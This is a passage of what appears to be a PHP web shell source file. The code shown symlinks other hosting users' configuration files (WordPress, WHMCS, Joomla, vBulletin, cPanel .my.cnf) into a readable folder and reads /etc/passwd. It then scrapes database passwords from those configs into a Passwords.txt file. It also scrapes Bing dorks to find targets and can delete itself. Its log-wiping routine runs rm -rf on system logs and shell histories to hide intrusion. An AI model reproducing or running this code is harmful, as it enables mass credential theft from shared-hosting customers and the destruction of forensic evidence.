  2594. @symlink('/home9/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2595. @symlink('/home9/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2596. @symlink('/home9/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2597. @symlink('/home9/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2598. @symlink('/home9/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2599. @symlink('/home9/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2600. @symlink('/home9/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2601. @symlink('/home9/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2602. @symlink('/home9/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2603. @symlink('/home9/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2604. @symlink('/home9/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2605. @symlink('/home9/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2606. @symlink('/home9/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2607. @symlink('/home9/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2608. @symlink('/home9/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2609.  
  2610. //home 10
  2611.  
  2612. @symlink('/home10/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2613. @symlink('/home10/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2614. @symlink('/home10/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2615. @symlink('/home10/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2616. @symlink('/home10/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2617. @symlink('/home10/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2618. @symlink('/home10/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2619. @symlink('/home10/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2620. @symlink('/home10/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2621. @symlink('/home10/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2622. @symlink('/home10/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2623. @symlink('/home10/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2624. @symlink('/home10/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2625. @symlink('/home10/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2626. @symlink('/home10/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2627. @symlink('/home10/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2628. @symlink('/home10/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2629. @symlink('/home10/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2630. @symlink('/home10/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2631. @symlink('/home10/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2632. @symlink('/home10/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2633. @symlink('/home10/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2634. @symlink('/home10/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2635. @symlink('/home10/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2636. @symlink('/home10/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2637. @symlink('/home10/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2638. @symlink('/home10/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2639. @symlink('/home10/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2640. @symlink('/home10/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2641. @symlink('/home10/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2642. @symlink('/home10/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2643. @symlink('/home10/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2644. @symlink('/home10/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2645. @symlink('/home10/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2646. @symlink('/home10/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2647. @symlink('/home10/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2648. @symlink('/home10/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2649. @symlink('/home10/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2650. @symlink('/home10/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2651. @symlink('/home10/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2652. @symlink('/home10/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2653. @symlink('/home10/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2654. @symlink('/home10/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2655. @symlink('/home10/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2656. @symlink('/home10/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2657. @symlink('/home10/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2658. @symlink('/home10/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2659. @symlink('/home10/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2660. @symlink('/home10/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2661. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2662. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2663. @symlink('/home10/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2664. @symlink('/home10/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2665. @symlink('/home10/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2666. @symlink('/home10/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2667. @symlink('/home10/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2668. @symlink('/home10/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2669. @symlink('/home10/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2670. @symlink('/home10/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2671. @symlink('/home10/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2672. @symlink('/home10/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2673. @symlink('/home10/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2674. @symlink('/home10/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2675. @symlink('/home10/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2676. @symlink('/home10/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2677. @symlink('/home10/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2678. @symlink('/home10/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2679. @symlink('/home10/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2680. @symlink('/home10/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2681. @symlink('/home10/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2682. @symlink('/home10/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2683. @symlink('/home10/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2684. @symlink('/home10/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2685. @symlink('/home10/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2686. @symlink('/home10/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2687. @symlink('/home10/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2688. @symlink('/home10/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2689. @symlink('/home10/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2690. @symlink('/home10/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2691. @symlink('/home10/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2692. @symlink('/home10/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2693. @symlink('/home10/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2694. @symlink('/home10/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2695. @symlink('/home10/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2696. @symlink('/home10/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2697. @symlink('/home10/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2698. @symlink('/home10/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2699. @symlink('/home10/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2700. @symlink('/home10/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2701. @symlink('/home10/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2702. @symlink('/home10/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2703. @symlink('/home10/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2704. @symlink('/home10/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2705. @symlink('/home10/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2706. @symlink('/home10/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2707. @symlink('/home10/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2708. @symlink('/home10/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2709. @symlink('/home10/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2710. @symlink('/home10/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2711. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2712. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2713. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2714. @symlink('/home10/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2715. @symlink('/home10/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2716. @symlink('/home10/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2717. @symlink('/home10/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2718. @symlink('/home10/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2719. @symlink('/home10/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2720. @symlink('/home10/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2721. @symlink('/home10/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2722. @symlink('/home10/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2723. @symlink('/home10/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2724. @symlink('/home10/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2725. @symlink('/home10/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2726. @symlink('/home10/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2727. @symlink('/home10/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2728. @symlink('/home10/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2729. @symlink('/home10/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2730. @symlink('/home10/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2731. @symlink('/home10/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2732. @symlink('/home10/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2733. @symlink('/home10/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2734. @symlink('/home10/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2735. @symlink('/home10/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2736. @symlink('/home10/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2737. @symlink('/home10/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2738. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2739. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2740. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2741. @symlink('/home10/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2742. @symlink('/home10/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2743. @symlink('/home10/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2744. @symlink('/home10/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2745. @symlink('/home10/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2746. @symlink('/home10/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2747. @symlink('/home10/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2748. @symlink('/home10/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2749. @symlink('/home10/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2750. @symlink('/home10/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2751. @symlink('/home10/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2752. @symlink('/home10/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2753. @symlink('/home10/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2754. @symlink('/home10/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2755. @symlink('/home10/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2756. @symlink('/home10/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2757. @symlink('/home10/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2758. @symlink('/home10/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2759. @symlink('/home10/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2760. @symlink('/home10/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2761. @symlink('/home10/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2762. @symlink('/home10/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2763. @symlink('/home10/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2764. @symlink('/home10/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2765. @symlink('/home10/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2766. @symlink('/home10/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2767. @symlink('/home10/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2768. @symlink('/home10/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2769. @symlink('/home10/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2770. @symlink('/home10/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2771. @symlink('/home10/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2772. @symlink('/home10/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2773. @symlink('/home10/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2774. @symlink('/home10/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2775. @symlink('/home10/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2776. @symlink('/home10/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2777. @symlink('/home10/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2778. @symlink('/home10/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2779. @symlink('/home10/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2780. @symlink('/home10/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2781. @symlink('/home10/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2782. @symlink('/home10/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2783. @symlink('/home10/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2784. @symlink('/home10/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2785. @symlink('/home10/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2786. @symlink('/home10/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2787. @symlink('/home10/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2788. @symlink('/home10/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2789. @symlink('/home10/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2790. @symlink('/home10/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2791. @symlink('/home10/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2792. @symlink('/home10/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2793. @symlink('/home10/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2794. }
  2795.  
  2796. //password grab
  2797.  
  2798. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2799. {
  2800.  
  2801. $ar0=explode($marqueurDebutLien, $text);
  2802. $ar1=explode($marqueurFinLien, $ar0[1]);
  2803. $ar=trim($ar1[0]);
  2804. return $ar;
  2805. }
  2806.  
  2807. $ffile=fopen('Passwords.txt','a+');
  2808.  
  2809.  
  2810. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/Gagak_symconf/";
  2811. $re=$r;
  2812. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2813.  
  2814. $users=file("/etc/passwd");
  2815. foreach($users as $user)
  2816. {
  2817.  
  2818. $str=explode(":",$user);
  2819. $usersss=$str[0];
  2820. foreach($confi as $co)
  2821. {
  2822.  
  2823.  
  2824. $uurl=$re.$usersss.$co;
  2825. $uel=$uurl;
  2826.  
  2827. $ch = curl_init();
  2828.  
  2829. curl_setopt($ch, CURLOPT_URL, $uel);
  2830. curl_setopt($ch, CURLOPT_HEADER, 1);
  2831. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2832. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2833. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2834. $result['EXE'] = curl_exec($ch);
  2835. curl_close($ch);
  2836. $uxl=$result['EXE'];
  2837.  
  2838.  
  2839. if($uxl && preg_match('/table_prefix/i',$uxl))
  2840. {
  2841.  
  2842. //Wordpress
  2843.  
  2844. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2845. if(!empty($dbp))
  2846. $pass=$dbp."\n";
  2847. fwrite($ffile,$pass);
  2848.  
  2849. }
  2850. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2851. {
  2852.  
  2853. //WHMCS
  2854.  
  2855. $dbp=entre2v2($uxl,"db_password = '","';");
  2856. if(!empty($dbp))
  2857. $pass=$dbp."\n";
  2858. fwrite($ffile,$pass);
  2859.  
  2860. }
  2861.  
  2862.  
  2863. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2864. {
  2865.  
  2866. //Joomla
  2867.  
  2868. $db=entre2v2($uxl,"password = '","';");
  2869. if(!empty($db))
  2870. $pass=$db."\n";
  2871. fwrite($ffile,$pass);
  2872. }
  2873. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2874. {
  2875.  
  2876. //Vbulletin
  2877.  
  2878. $db=entre2v2($uxl,"password'] = '","';");
  2879. if(!empty($db))
  2880. $pass=$db."\n";
  2881. fwrite($ffile,$pass);
  2882.  
  2883. }
  2884. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2885. {
  2886.  
  2887. //Other
  2888.  
  2889. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2890. if(!empty($db))
  2891. $pass=$db."\n";
  2892. fwrite($ffile,$pass);
  2893. }
  2894. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2895. {
  2896.  
  2897. //Other
  2898.  
  2899. $db=entre2v2($uxl,"dbpass = '","';");
  2900. if(!empty($db))
  2901. $pass=$db."\n";
  2902. fwrite($ffile,$pass);
  2903. }
  2904. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2905. {
  2906.  
  2907. //Other
  2908.  
  2909. $db=entre2v2($uxl,"dbpass = '","';");
  2910. if(!empty($db))
  2911. $pass=$db."\n";
  2912. fwrite($ffile,$pass);
  2913.  
  2914. }
  2915. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2916. {
  2917.  
  2918. //Other
  2919.  
  2920. $db=entre2v2($uxl,"dbpass = \"","\";");
  2921. if(!empty($db))
  2922. $pass=$db."\n";
  2923. fwrite($ffile,$pass);
  2924. }
  2925.  
  2926.  
  2927. }
  2928. }
  2929. echo "<center>
  2930. <a href=\"Gagak_symconf/root/\">Root Server</a>
  2931. <br><a href=\"Gagak_symconf/Passwords.txt\">Passwords</a>
  2932. <br><a href=\"Gagak_symconf/\">Configurations</a></center>";
  2933. }
  2934. else
  2935. {
  2936. echo "<center>
  2937. <form method=\"POST\">
  2938. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2939. $file = '/etc/passwd';
  2940. $read = @fopen($file, 'r');
  2941. if ($read){
  2942. $body = @fread($read, @filesize($file));
  2943. echo "".htmlentities($body)."";
  2944. }
  2945. elseif(!$read)
  2946. {
  2947. $read = @show_source($file) ;
  2948. }
  2949. elseif(!$read)
  2950. {
  2951. $read = @highlight_file($file);
  2952. }
  2953. elseif(!$read)
  2954. {
  2955. for($uid=0;$uid<1000;$uid++)
  2956. {
  2957. $ara = posix_getpwuid($uid);
  2958. if (!empty($ara))
  2959. {
  2960. while (list ($key, $val) = each($ara))
  2961. {
  2962. print "$val:";
  2963. }
  2964. print "\n";
  2965. }}}
  2966.  
  2967. flush();
  2968.  
  2969. echo "</textarea>
  2970. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2971. </form></center>";
  2972. }
  2973. }
  2974. } elseif(isset($_GET['GagakPutih']) && ($_GET['GagakPutih'] == 'bing'))
  2975. {   @ini_set('output_buffering',0);
  2976. ?>
  2977. <head>
  2978. <style type="text/css">
  2979. textarea {
  2980.     width: 500px;
  2981.     height: 250px;
  2982.     border: 1px solid #000000;
  2983.     margin: 5px auto;
  2984.     padding: 7px;
  2985. }
  2986. input[type=text] {
  2987.     padding-left: 7px;
  2988.     width: 250px;
  2989.     height: 25px;
  2990.     border: 1px solid #000000;
  2991.     background: blue;
  2992.     margin: 5px auto;
  2993. }
  2994. </style>
  2995. </head>
  2996. <center><form method="post">
  2997. Bing Dork: <input type="text" name="dork" placeholder="dork" required>
  2998. <input type="submit" name="go" value=">>">
  2999. </form>
  3000. <?php
  3001. // coded by Mr. Magnom
  3002. // Re-Coded to Web Based by Mr. Error 404 - IndoXploit
  3003. // greetz to Mr. Magnom - Sanjungan Jiwa
  3004. function getsource($url, $proxy) {
  3005.     $curl = curl_init($url);
  3006.     curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  3007.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3008.     if($proxy) {
  3009.         $proxy = explode(':', autoprox());
  3010.         curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
  3011.         curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
  3012.     }
  3013.     $content = curl_exec($curl);
  3014.     curl_close($curl);
  3015.     return $content;
  3016. }
  3017. $dork = htmlspecialchars($_POST['dork']);
  3018. $do = urlencode($dork);
  3019. if(isset($_POST['go'])) {
  3020.     $npage = 1;
  3021.     $npages = 30000;
  3022.     $allLinks = array();
  3023.     $lll = array();
  3024.     while($npage <= $npages) {
  3025.         $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
  3026.         if($x) {
  3027.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  3028.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  3029.             $npage = $npage + 10;
  3030.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  3031.         } else break;
  3032.     }
  3033.     $URLs = array();
  3034.     foreach($allLinks as $url){
  3035.         $exp = explode("/", $url);
  3036.         $URLs[] = $exp[2];
  3037.     }
  3038.     $array = array_filter($URLs);
  3039.     $array = array_unique($array);
  3040.     $sss = count(array_unique($array));
  3041.     echo "ToTaL SiTe : $sss<br>";
  3042.     foreach($array as $domain) {
  3043.         echo "http://$domain/<br>";
  3044.     }
  3045. }
  3046. }elseif($_GET['GagakPutih'] == 'info') {
  3047. echo '<br><table width="700" align="center">
  3048. <tr><td>
  3049. <center>
  3050. System : '.$sys.'<br>
  3051. IP : '.$ip.'<br>
  3052. Safe Mode : '.$sm.'<br>
  3053. Disabled Functions : '.$ds.'<br>
  3054. Home_root : '.$home_r.'
  3055. </center>
  3056. </td></tr>
  3057. </table>';
  3058. }elseif($_GET['GagakPutih'] == 'kill') {
  3059. $fileini = $_SERVER['SCRIPT_FILENAME'];
  3060. rmdir('Gagak_sym');rmdir('Gagak_conf');unlink($fileini);
  3061. echo 'Good By User :)';
  3062. }elseif($_GET['GagakPutih'] == 'logs') {
  3063.     echo '<br><center><b><span>Pengaman Bro ( Sefty Can Be Fun )</span></b><center><br>';
  3064.     echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";      
  3065.     exec("rm -rf /tmp/logs");
  3066.     exec("rm -rf /root/.ksh_history");
  3067.     exec("rm -rf /root/.bash_history");
  3068.     exec("rm -rf /root/.bash_logout");
  3069.     exec("rm -rf /usr/local/apache/logs");
  3070.     exec("rm -rf /usr/local/apache/log");
  3071.     exec("rm -rf /var/apache/logs");
  3072.     exec("rm -rf /var/apache/log");
  3073.     exec("rm -rf /var/run/utmp");
  3074.     exec("rm -rf /var/logs");
  3075.     exec("rm -rf /var/log");
  3076.     exec("rm -rf /var/adm");
  3077.     exec("rm -rf /etc/wtmp");
  3078.     exec("rm -rf /etc/utmp");
  3079.     exec("rm -rf $HISTFILE");
  3080.     exec("rm -rf /var/log/lastlog");
  3081.     exec("rm -rf /var/log/wtmp");
  3082.  
  3083.     shell_exec("rm -rf /tmp/logs");
  3084.     shell_exec("rm -rf /root/.ksh_history");
  3085.     shell_exec("rm -rf /root/.bash_history");
  3086.     shell_exec("rm -rf /root/.bash_logout");
  3087.     shell_exec("rm -rf /usr/local/apache/logs");
  3088.     shell_exec("rm -rf /usr/local/apache/log");
  3089.     shell_exec("rm -rf /var/apache/logs");
  3090.     shell_exec("rm -rf /var/apache/log");
  3091.     shell_exec("rm -rf /var/run/utmp");
  3092.     shell_exec("rm -rf /var/logs");
  3093.     shell_exec("rm -rf /var/log");
  3094.     shell_exec("rm -rf /var/adm");
  3095.     shell_exec("rm -rf /etc/wtmp");
  3096.     shell_exec("rm -rf /etc/utmp");
  3097.     shell_exec("rm -rf $HISTFILE");
